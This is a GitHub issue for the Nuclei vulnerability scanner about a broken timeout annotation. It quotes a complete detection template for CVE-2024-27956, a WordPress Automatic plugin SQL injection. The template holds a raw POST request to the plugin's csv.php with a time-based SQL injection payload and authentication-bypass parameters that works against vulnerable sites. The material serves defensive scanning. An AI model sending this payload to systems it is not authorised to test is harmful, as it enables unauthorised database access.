You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This is directly related with max-host-error , so we need to make sure that we ignore timeout based templates from mhe since these are not unresponsive errors but are caused by exploit
id: CVE-2024-27956info:
name: WordPress Automatic Plugin <= 3.92.0 - SQL Injectionauthor: DhiyaneshDKseverity: criticaldescription: | The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.remediation: | Update to version 3.92.1 or later.reference:
- https://github.com/truonghuuphuc/CVE-2024-27956
- https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve
- https://github.com/NaInSec/CVE-LIST
- https://github.com/nomi-sec/PoC-in-GitHubclassification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:Lcvss-score: 9.9cve-id: CVE-2024-27956cwe-id: CWE-89epss-score: 0.00043epss-percentile: 0.08203metadata:
verified: truemax-request: 1publicwww-query: "wp-content/plugins/wp-automatic"tags: cve,cve2024,sqli,wordpress,wpscan,wp-automatichttp:
- raw:
- | @timeout: 20s POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2faematchers:
- type: dsldsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains(header, "application/csv")'condition: and
Anything else:
The text was updated successfully, but these errors were encountered:
tarunKoyalwar
added
the
Type: Bug
Inconsistencies or issues which will cause an issue or problem for users or implementors.
label
May 2, 2024
tarunKoyalwar
changed the title
timeout not working in templates
timeout request annotation not working in templates
May 2, 2024
Nuclei version:
main | dev
Current Behavior:
timeout
request annotation fail because of recent change in-mhe
Note
This is directly related with max-host-error , so we need to make sure that we ignore
timeout
based templates from mhe since these are not unresponsive errors but are caused by exploitProposed Solution
Steps To Reproduce:
Anything else:
The text was updated successfully, but these errors were encountered: